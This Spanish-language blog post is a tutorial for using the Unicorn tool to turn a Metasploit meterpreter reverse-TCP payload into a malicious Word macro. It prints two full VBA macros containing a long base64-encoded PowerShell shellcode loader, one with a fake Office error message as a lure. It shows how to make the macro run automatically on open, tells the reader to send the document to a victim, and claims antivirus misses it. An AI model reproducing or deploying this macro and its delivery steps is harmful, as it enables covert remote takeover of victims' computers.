lunes, 5 de octubre de 2015

Unicorn la herramienta de infección mediante PowerShell



Unicorn es una herramienta de código abierto simple para el uso de un ataque PowerShell su función es inyectar código shell directamente en la memoria. sobre la base de los ataques de PowerShell de Graeber  la cual puede ser ampliado para rebajar automáticamente el proceso si se detecta una plataforma de 64 bits. Esto es útil con el fin de garantizar que podemos entregar una carga útil con un solo conjunto de instrucciones shellcode.
Esto funcionará en cualquier versión de Windows PowerShell y la técnica de bypass powershell, la cual puede ser aprovechada para recibir conexiones con la herramienta metasploit, ya que el código malicioso de ejecutara en un archivo Office de las versiones 2016 y las versiones anteriores, como Word y Excel.

Descarga

https://github.com/trustedsec/unicorn

Iniciando Unicorn.

Una ves que hemos descargado la herramienta y extraída entraremos a la carpeta para ejecutarlo, no olviden dar los permisos chmod 775 *

root@kali:~/unicorn-master# ./unicorn.py 



Como vemos nos arroja los script para poder utilizar nuestra inyección de payload, en mi caso crearemos uno de la siguiente manera porque lo haré por medio de una macro

 root@kali:~/unicorn-master# python unicorn.py windows/meterpreter/reverse_tcp 192.168.179.129 443 macro

Como podemos observar  nuestro código malicioso se acaba de crear  en un documento .TXT . lo que haremos ahora sera abrirlo por leafpad mediante la terminal y seleccionar todo el código, luego de ello pasaremos a entrar a una maquina windows para configurar nuestro payload en office Word 

Configurando nuestro payload con Word

Lo primero que debemos sera abrir un documento Word  y crear nuestro Macro , para ello debemos entrar a la pestaña "Vista" >>> Macros.


Añadiremos el nombre de nuestra macro, en este ejemplo le añadí el nombre macro como prueba, luego de ello el daremos crear y nos aparecerá la siguiente ventana:


Las macros son creadas por un lenguaje de programación muy conocido como  lo es (Visual Basic), para poder inyectar nuestro payload en el mismo macro del documento Word, le daremos en la primera opción donde dice " TheDocument" y añadiremos nuestro código que se creo unicorn , pero antes debemos configurar lo de la siguiente manera.


Codigo original

--------------------------------------------------------------------------------------------------------------------------
Sub Auto_Open()
Dim x
x = "powershell -window hidden -enc JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5A" _
& "HAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAU" _
& "wB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkA" _
& "GUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAGMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBiACwAM" _
& "AB4AGYAYQAsADAAeABhADIALAAwAHgANgAzACwAMAB4AGQAYgAsADAAeABkAGQALAAwAHgAYwAwACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMwAzACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADMAMQAsADAAeAA1ADgALAAwAHgAMQAzACwAMAB4ADAAMwAsADAAeAA1ADgALAAwAHgAMQAzACwAMAB4ADgAMwAsADAAeABlADgALAAwAHgAMAA2ACwAMAB4ADQAMAAsADAAeAA5ADYALAAwAHgAMgA3ACwAMAB4ADEAZQAsADAAeAAwA" _
& "DcALAAwAHgANQA5ACwAMAB4AGQAOAAsADAAeABkAGUALAAwAHgANgA4ACwAMAB4AGQAMwAsADAAeAAzAGQALAAwAHgAZQBmACwAMAB4AGEAOAAsADAAeAA4ADcALAAwAHgAMwA2ACwAMAB4ADUAZgAsADAAeAAxADkALAAwAHgAYwAzACwAMAB4ADEAYgAsADAAeAA1ADMALAAwAHgAZAAyACwAMAB4ADgAMQAsADAAeAA4AGYALAAwAHgAZQAwACwAMAB4ADkANgAsADAAeAAwAGQALAAwAHgAYgBmACwAMAB4ADQAMQAsADAAeAAxAGMALAAwAHgANgA4ACwAMAB4ADgAZQAsADAAeAA1ADIALAAwAHgAMABkACwAM" _
& "AB4ADQAOAAsADAAeAA5ADEALAAwAHgAZAAwACwAMAB4ADQAYwAsADAAeAA5AGQALAAwAHgANwAxACwAMAB4AGUAOQAsADAAeAA5AGUALAAwAHgAZAAwACwAMAB4ADcAMAAsADAAeAAyAGUALAAwAHgAYwAyACwAMAB4ADEAOQAsADAAeAAyADAALAAwAHgAZQA3ACwAMAB4ADgAOAAsADAAeAA4AGMALAAwAHgAZAA1ACwAMAB4ADgAYwAsADAAeABjADUALAAwAHgAMABjACwAMAB4ADUAZAAsADAAeABkAGUALAAwAHgAYwA4ACwAMAB4ADEANAAsADAAeAA4ADIALAAwAHgAOQA2ACwAMAB4AGUAYgAsADAAeAAzA" _
& "DUALAAwAHgAMQA1ACwAMAB4AGEAZAAsADAAeABiADUALAAwAHgAOQA1ACwAMAB4ADkANwAsADAAeAA2ADIALAAwAHgAYwBlACwAMAB4ADkAZgAsADAAeAA4AGYALAAwAHgANgA3ACwAMAB4AGUAYgAsADAAeAA1ADYALAAwAHgAMwBiACwAMAB4ADUAMwAsADAAeAA4ADcALAAwAHgANgA4ACwAMAB4AGUAZAAsADAAeABhAGEALAAwAHgANgA4ACwAMAB4AGMANgAsADAAeABkADAALAAwAHgAMAAzACwAMAB4ADkAYgAsADAAeAAxADYALAAwAHgAMQA0ACwAMAB4AGEAMwAsADAAeAA0ADQALAAwAHgANgBkACwAM" _
& "AB4ADYAYwAsADAAeABkADAALAAwAHgAZgA5ACwAMAB4ADcANgAsADAAeABhAGIALAAwAHgAYQBiACwAMAB4ADIANQAsADAAeABmADIALAAwAHgAMgA4ACwAMAB4ADAAYgAsADAAeABhAGQALAAwAHgAYQA0ACwAMAB4ADkANAAsADAAeABhAGEALAAwAHgANgAyACwAMAB4ADMAMgAsADAAeAA1AGUALAAwAHgAYQAwACwAMAB4AGMAZgAsADAAeAAzADAALAAwAHgAMwA4ACwAMAB4AGEANAAsADAAeABjAGUALAAwAHgAOQA1ACwAMAB4ADMAMgAsADAAeABkADAALAAwAHgANQBiACwAMAB4ADEAOAAsADAAeAA5A" _
& "DUALAAwAHgANQAxACwAMAB4ADEAZgAsADAAeAAzAGYALAAwAHgAMwAxACwAMAB4ADMAYQAsADAAeABmAGIALAAwAHgANQBlACwAMAB4ADYAMAAsADAAeABlADYALAAwAHgAYQBhACwAMAB4ADUAZgAsADAAeAA3ADIALAAwAHgANAA5ACwAMAB4ADEAMgAsADAAeABmAGEALAAwAHgAZgA4ACwAMAB4ADYANwAsADAAeAA0ADcALAAwAHgANwA3ACwAMAB4AGEAMwAsADAAeABlAGYALAAwAHgAYQA0ACwAMAB4AGIAYQAsADAAeAA1AGMALAAwAHgAZQBmACwAMAB4AGEAMgAsADAAeABjAGQALAAwAHgAMgBmACwAM" _
& "AB4AGQAZAAsADAAeAA2AGQALAAwAHgANgA2ACwAMAB4AGIAOAAsADAAeAA2AGQALAAwAHgAZQA1ACwAMAB4AGEAMAAsADAAeAAzAGYALAAwAHgAOQAyACwAMAB4AGQAYwAsADAAeAAxADUALAAwAHgAYQBmACwAMAB4ADYAZAAsADAAeABkAGYALAAwAHgANgA1ACwAMAB4AGYAOQAsADAAeABhADkALAAwAHgAOABiACwAMAB4ADMANQAsADAAeAA5ADEALAAwAHgAMQA4ACwAMAB4AGIANAAsADAAeABkAGQALAAwAHgANgAxACwAMAB4AGEANQAsADAAeAA2ADEALAAwAHgANABiACwAMAB4ADYANwAsADAAeAAzA" _
& "DEALAAwAHgANABhACwAMAB4ADIANAAsADAAeABkADQALAAwAHgANAAwACwAMAB4ADIAMgAsADAAeAAzADcALAAwAHgAMQBiACwAMAB4ADQAMwAsADAAeAAwADgALAAwAHgAYgBlACwAMAB4AGYAZAAsADAAeAAxADMALAAwAHgAMwBlACwAMAB4ADkAMQAsADAAeAA1ADEALAAwAHgAZAAzACwAMAB4AGUAZQAsADAAeAA1ADEALAAwAHgAMAAyACwAMAB4AGIAYgAsADAAeABlADQALAAwAHgANQBkACwAMAB4ADcAZAAsADAAeABkAGIALAAwAHgAMAA2ACwAMAB4AGIANAAsADAAeAAxADYALAAwAHgANwAxACwAM" _
& "AB4AGUAOQAsADAAeAA2ADEALAAwAHgANABlACwAMAB4AGUAZAAsADAAeAA5ADAALAAwAHgAMgBiACwAMAB4ADAANAAsADAAeAA4AGMALAAwAHgANQBkACwAMAB4AGUANgAsADAAeAA2ADAALAAwAHgAOABlACwAMAB4AGQANgAsADAAeAAwADUALAAwAHgAOQA0ACwAMAB4ADQAMAAsADAAeAAxAGYALAAwAHgANgAzACwAMAB4ADgANgAsADAAeAAzADQALAAwAHgAZQBmACwAMAB4ADMAZQAsADAAeABmADQALAAwAHgAOQAyACwAMAB4AGYAMAAsADAAeAA5ADQALAAwAHgAOQAzACwAMAB4ADEAYQAsADAAeAA2A" _
& "DUALAAwAHgAMQAzACwAMAB4ADMAMgAsADAAeAA0AGQALAAwAHgAMQAxACwAMAB4ADEAOQAsADAAeAA2ADMALAAwAHgAYgA5ACwAMAB4AGIAZQAsADAAeABlADIALAAwAHgANAA2ACwAMAB4AGIAMgAsADAAeAA3ADcALAAwAHgANwA3ACwAMAB4ADIAOQAsADAAeABhAGMALAAwAHgANwA3ACwAMAB4ADkANwAsADAAeABhADkALAAwAHgAMgBjACwAMAB4ADIAZQAsADAAeABmAGQALAAwAHgAYQA5ACwAMAB4ADQANAAsADAAeAA5ADYALAAwAHgAYQA1ACwAMAB4AGYAOQAsADAAeAA3ADEALAAwAHgAZAA5ACwAM" _
& "AB4ADcAMwAsADAAeAA2AGUALAAwAHgAMgBhACwAMAB4ADQAYwAsADAAeAA3AGMALAAwAHgAYwA3ACwAMAB4ADkAZgAsADAAeABjADcALAAwAHgAMQA0ACwAMAB4AGUANQAsADAAeABjADYALAAwAHgAMgAwACwAMAB4AGIAYgAsADAAeAAxADYALAAwAHgAMgBkACwAMAB4AGIAMQAsADAAeAA4ADcALAAwAHgAYwAwACwAMAB4ADAAYgAsADAAeABjADcALAAwAHgAZQA5ACwAMAB4AGQAMAA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxA" _
& "DAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAeAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAeAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAI" _
& "AAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAeAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkA" _
& "DEAKQApADsAJAAyACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAMwAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAAzACAAJAAyACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAb" _
& "wB3AGUAcgBzAGgAZQBsAGwAIAAkADIAIAAkAGUAIgA7AH0A"
Shell ("POWERSHELL.EXE " & x)
Dim title As String
title = "Critical Microsoft Office Error"
Dim msg As String
Dim intResponse As Integer
msg = "This document appears to be corrupt or missing critical rows in order to restore. Please restore this file from a backup."
intResponse = MsgBox(msg, 16, title)
Application.Quit
End Sub
--------------------------------------------------------------------------------------------------------------------------


Código configurado


--------------------------------------------------------------------------------------------------------------------------
Sub AutoOpen()
Dim x
x = "powershell -window hidden -enc JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5A" _
& "HAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAU" _
& "wB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkA" _
& "GUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAGMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAM" _
& "AB4AGMAOAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBmACwAMAB4ADIAYgAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeABiAGIALAAwAHgANAA3ACwAMAB4ADAAZQAsADAAeABmADkALAAwAHgAOQA1ACwAMAB4ADMAMQAsADAAeAA1AGYALAAwAHgAMQA4ACwAMAB4ADgAMwAsADAAeABjADcALAAwAHgAMAA0ACwAMAB4ADAAMwAsADAAeAA1AGYALAAwAHgANQAzACwAMAB4AGUAYwAsADAAeAAwAGMALAAwAHgANgA5ACwAMAB4AGIAMwAsADAAeAA3A" _
& "DIALAAwAHgAZQBlACwAMAB4ADkAMgAsADAAeAA0ADMALAAwAHgAMQAzACwAMAB4ADYANgAsADAAeAA3ADcALAAwAHgANwAyACwAMAB4ADEAMwAsADAAeAAxAGMALAAwAHgAZgAzACwAMAB4ADIANAAsADAAeABhADMALAAwAHgANQA2ACwAMAB4ADUAMQAsADAAeABjADgALAAwAHgANAA4ACwAMAB4ADMAYQAsADAAeAA0ADIALAAwAHgANQBiACwAMAB4ADMAYwAsADAAeAA5ADMALAAwAHgANgA1ACwAMAB4AGUAYwAsADAAeAA4AGIALAAwAHgAYwA1ACwAMAB4ADQAOAAsADAAeABlAGQALAAwAHgAYQAwACwAM" _
& "AB4ADMANgAsADAAeABjAGEALAAwAHgANgBkACwAMAB4AGIAYgAsADAAeAA2AGEALAAwAHgAMgBjACwAMAB4ADQAYwAsADAAeAA3ADQALAAwAHgANwBmACwAMAB4ADIAZAAsADAAeAA4ADkALAAwAHgANgA5ACwAMAB4ADcAMgAsADAAeAA3AGYALAAwAHgANAAyACwAMAB4AGUANQAsADAAeAAyADEALAAwAHgAOQAwACwAMAB4AGUANwAsADAAeABiADMALAAwAHgAZgA5ACwAMAB4ADEAYgAsADAAeABiAGIALAAwAHgANQAyACwAMAB4ADcAYQAsADAAeABmAGYALAAwAHgAMABiACwAMAB4ADUANAAsADAAeABhA" _
& "GIALAAwAHgAYQBlACwAMAB4ADAAMAAsADAAeAAwAGYALAAwAHgANgBiACwAMAB4ADUAMAAsADAAeABjADUALAAwAHgAMwBiACwAMAB4ADIAMgAsADAAeAA0AGEALAAwAHgAMABhACwAMAB4ADAAMQAsADAAeABmAGMALAAwAHgAZQAxACwAMAB4AGYAOAAsADAAeABmAGQALAAwAHgAZgBmACwAMAB4ADIAMwAsADAAeAAzADEALAAwAHgAZgBkACwAMAB4AGEAYwAsADAAeAAwAGQALAAwAHgAZgBlACwAMAB4ADAAYwAsADAAeABhAGMALAAwAHgANABhACwAMAB4ADMAOAAsADAAeABlAGYALAAwAHgAZABiACwAM" _
& "AB4AGEAMgAsADAAeAAzAGIALAAwAHgAOQAyACwAMAB4AGQAYgAsADAAeAA3ADAALAAwAHgANAA2ACwAMAB4ADQAOAAsADAAeAA2ADkALAAwAHgANgAzACwAMAB4AGUAMAAsADAAeAAxAGIALAAwAHgAYwA5ACwAMAB4ADQAZgAsADAAeAAxADEALAAwAHgAYwBmACwAMAB4ADgAYwAsADAAeAAwADQALAAwAHgAMQBkACwAMAB4AGEANAAsADAAeABkAGIALAAwAHgANAAzACwAMAB4ADAAMQAsADAAeAAzAGIALAAwAHgAMABmACwAMAB4AGYAOAAsADAAeAAzAGQALAAwAHgAYgAwACwAMAB4AGEAZQAsADAAeAAyA" _
& "GYALAAwAHgAYgA0ACwAMAB4ADgAMgAsADAAeAA5ADQALAAwAHgAZQBiACwAMAB4ADkAZAAsADAAeAA1ADEALAAwAHgAYgA0ACwAMAB4AGEAYQAsADAAeAA3AGIALAAwAHgAMwA3ACwAMAB4AGMAOQAsADAAeABhAGQALAAwAHgAMgA0ACwAMAB4AGUAOAAsADAAeAA2AGYALAAwAHgAYQA1ACwAMAB4AGMAOAAsADAAeABmAGQALAAwAHgAMQBkACwAMAB4AGUANAAsADAAeAA4ADQALAAwAHgAMwAyACwAMAB4ADIAYwAsADAAeAAxADcALAAwAHgANQA0ACwAMAB4ADUAZAAsADAAeAAyADcALAAwAHgANgA0ACwAM" _
& "AB4ADYANgAsADAAeABjADIALAAwAHgAOQAzACwAMAB4AGUAMgAsADAAeABjAGEALAAwAHgAOABiACwAMAB4ADMAZAAsADAAeABmADQALAAwAHgAMgBkACwAMAB4AGEANgAsADAAeABmAGEALAAwAHgANgBhACwAMAB4AGQAMAAsADAAeAA0ADkALAAwAHgAZgBiACwAMAB4AGEAMwAsADAAeAAxADYALAAwAHgAMQBkACwAMAB4AGEAYgAsADAAeABkAGIALAAwAHgAYgBmACwAMAB4ADEAZQAsADAAeAAyADAALAAwAHgAMQBjACwAMAB4ADQAMAAsADAAeABjAGIALAAwAHgAZABkACwAMAB4ADEAOQAsADAAeABkA" _
& "DYALAAwAHgAMwA0ACwAMAB4ADgAOQAsADAAeAA5ADEALAAwAHgAYQA3ACwAMAB4AGQAZAAsADAAeABjADgALAAwAHgAZAA1ACwAMAB4AGEANgAsADAAeABhADYALAAwAHgANAA0ACwAMAB4ADMAMwAsADAAeABmADgALAAwAHgAOAA4ACwAMAB4ADAANgAsADAAeABlAGMALAAwAHgAYgA4ACwAMAB4ADcAOAAsADAAeABlADcALAAwAHgANQBjACwAMAB4ADUAMAAsADAAeAA5ADMALAAwAHgAZQA4ACwAMAB4ADgAMwAsADAAeAA0ADAALAAwAHgAOQBjACwAMAB4ADIAMgAsADAAeABhAGMALAAwAHgAZQBhACwAM" _
& "AB4ADcAMwAsADAAeAA5AGIALAAwAHgAOAA0ACwAMAB4ADgAMgAsADAAeABlAGEALAAwAHgAOAA2ACwAMAB4ADUAZgAsADAAeAAzADMALAAwAHgAZgAyACwAMAB4ADEAYwAsADAAeAAxAGEALAAwAHgANwAzACwAMAB4ADcAOAAsADAAeAA5ADMALAAwAHgAZABhACwAMAB4ADMAZAAsADAAeAA4ADkALAAwAHgAZABlACwAMAB4AGMAOAAsADAAeABhADkALAAwAHgANwA5ACwAMAB4ADkANQAsADAAeABiADMALAAwAHgANwBmACwAMAB4ADgANQAsADAAeAAwADMALAAwAHgAZAA5ACwAMAB4ADcAZgAsADAAeAAxA" _
& "DMALAAwAHgAYQA4ACwAMAB4ADQAOAAsADAAeAAyADgALAAwAHgAOABiACwAMAB4AGIAMgAsADAAeABhAGQALAAwAHgAMQBlACwAMAB4ADEANAAsADAAeAA0AGMALAAwAHgAOQA4ACwAMAB4ADEANQAsADAAeAA5AGQALAAwAHgAZAA4ACwAMAB4ADYAMwAsADAAeAA0ADEALAAwAHgAZQAyACwAMAB4ADAAYwAsADAAeAA2ADQALAAwAHgAOQAxACwAMAB4AGIANAAsADAAeAA0ADYALAAwAHgANgA0ACwAMAB4AGYAOQAsADAAeAA2ADAALAAwAHgAMwAzACwAMAB4ADMANwAsADAAeAAxAGMALAAwAHgANgBmACwAM" _
& "AB4AGUAZQAsADAAeAAyAGIALAAwAHgAOABkACwAMAB4AGYAYQAsADAAeAAxADEALAAwAHgAMQBhACwAMAB4ADYAMgAsADAAeABhAGMALAAwAHgANwA5ACwAMAB4AGEAMAAsADAAeAA1AGQALAAwAHgAOQBhACwAMAB4ADIANQAsADAAeAA1AGIALAAwAHgAOAA4ACwAMAB4ADEAYQAsADAAeAAxADkALAAwAHgAOABhACwAMAB4AGYANAAsADAAeAA2ADgALAAwAHgANwAzACwAMAB4ADAAZQA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxA" _
& "DAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAeAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAeAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAI" _
& "AAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAeAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkA" _
& "DEAKQApADsAJAAyACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAMwAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAAzACAAJAAyACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAb" _
& "wB3AGUAcgBzAGgAZQBsAGwAIAAkADIAIAAkAGUAIgA7AH0A"
Shell ("POWERSHELL.EXE " & x)
Dim intResponse As Integer

End Sub
--------------------------------------------------------------------------------------------------------------------------

como vemos unicamente  hemos cambiado algunas cosas como por ejemplo en la linea original : Sub Auto_Open() la modificamos como  Sub AutoOpen() para que nuestro script se ejecute en el mismo momento que la victima ejecute el documento, luego en las lineas de abajo eliminamos las siguientes:

Dim title As String
title = "Critical Microsoft Office Error"
Dim msg As String

msg = "This document appears to be corrupt or missing critical rows in order to restore. Please restore this file from a backup."
intResponse = MsgBox(msg, 16, title)
Application.Quit

y solamente nos quedaremos con las siguientes:

Shell ("POWERSHELL.EXE " & x)
Dim intResponse As Integer

End Sub

quise dejar en claro, que las lineas que eliminamos son códigos de ejecución que harán que no se ejecute nuestro script en el documento word, si no en la macro.

Una ves ya configurado nuestro código, pasaremos a copiar y guardarlo en ThisDocument

luego de añadir nuestro código malicioso de nuestro payload, cerramos la ventada de la Macro y nos aparecera la Hoja de Word, le añadiremos cualquier cosa por ejemplo yo le pondré lo siguiente:


Guardamos nuestro documento ya hemos creado nuestro archivo Word infectado, lo que haremos sera enviarlo el documento a la victima y esperar que lo abra.

VICTIMA

cuando la victima abra le documento le aparecerá lo que añadimos a la hoja de trabajo pero nosotros ya hemos capturado su sesión en metasploit y obtenido al acceso

Algo que sera de mucha utilidad es que el documento malicioso NO es detectado por Antivirus conocidos.

Maquina del servidor en metasploit



Como vemos hemos obtenido explotar el sistema.
Happy Hacking !!!!!!



0 comentarios:

Publicar un comentario

Datos del Autor


Obra de K. Haring

Hola, mi nombre es omar soy estudiante de Ingenieria de sistemas en Perú. actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.


"Me considero un novato en busca de conocimiento"


Entradas Populares